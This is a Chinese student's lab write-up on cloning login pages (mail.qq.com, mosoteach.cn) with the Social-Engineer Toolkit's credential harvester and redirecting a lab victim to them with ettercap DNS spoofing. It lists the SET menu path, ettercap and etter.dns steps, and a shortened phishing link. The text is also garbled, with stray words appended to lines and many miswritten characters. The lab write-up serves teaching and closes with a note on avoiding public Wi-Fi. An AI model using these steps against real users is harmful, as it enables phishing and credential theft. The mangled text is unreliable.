(1)一般在什么场景下容易受到DNS spoof攻击。apache
(2)在平常生活工做中如何防范以上两攻击方法。缓存
简单应用SET工具创建冒名网站网络
ettercap DNS spoofapp
结合应用两种技术,用DNS spoof引导特定访问到冒名网站工具
请勿使用外部网站作实验网站
netstat -tupln |grep 80
查看80端口是否被使用,若是被使用的话,则使用kill + PID
杀死进程sudo vi /etc/apache2/ports.conf
指令修改Apache的端口配置文件,将端口改成http对应的80号端口apachectl start
开启Apache服务setoolkit
打开SET工具1
选择 Social-Engineering Attacks(社会工程学攻击)2
选择 Website Attack Vectors(钓鱼网站攻击向量)3
Credential Harvester Attack Method(登陆密码截取攻击)2
Site Cloner(进行克隆网站)192.168.1.216
(攻击者IP)mail.qq.com
(被克隆的url)http:192.168.1.216
进行网址缩短,在靶机winXP中访问缩短后网址http://suo.im/55eObz
能够看到访问到克隆网站,ifconfig eth0 promisc
将kali改成混杂模式vi /etc/ettercap/etter.dns
对DNS缓存表进行修改
192.168.43.144
ettercap -G
开启ettercap,选择 Sniff -> unified sniffing ,在弹出的界面中选择 eth0 -> ok,监听eth0网卡注:个人kali没法搜索出来其余主机的IP,因此我又搞了一台kali再次扫描的时候,就能够扫描出来了。嘻嘻。url
192.168.43.1
(kali的网关)添加到target1,靶机IP192.168.43.21
(另外一台kali的IP)添加到target2ping www.cnblogs.com
返回的数据中显示的是kali的IP192.168.1.101
,克隆的网站输入mosoteach.cn
(蓝墨云)完成第一步。ping www.cnblogs.com
返回的数据中显示的是攻击者kali的IP,访问www.cnblogs.com
时跳转到以前克隆的蓝墨云网站界面。本次实验真的是颇有趣,同时也让我明白原来被骗是如此容易,之后尽可能不要使用公共的wifi,毕竟也不知道连着相同wifi里有没有想搞事情的坏人。而后偷偷吐槽一下个人电脑,永远有着谜通常的问题,让我在实验中感觉一点成功的快乐和无限处理bug的痛苦。spa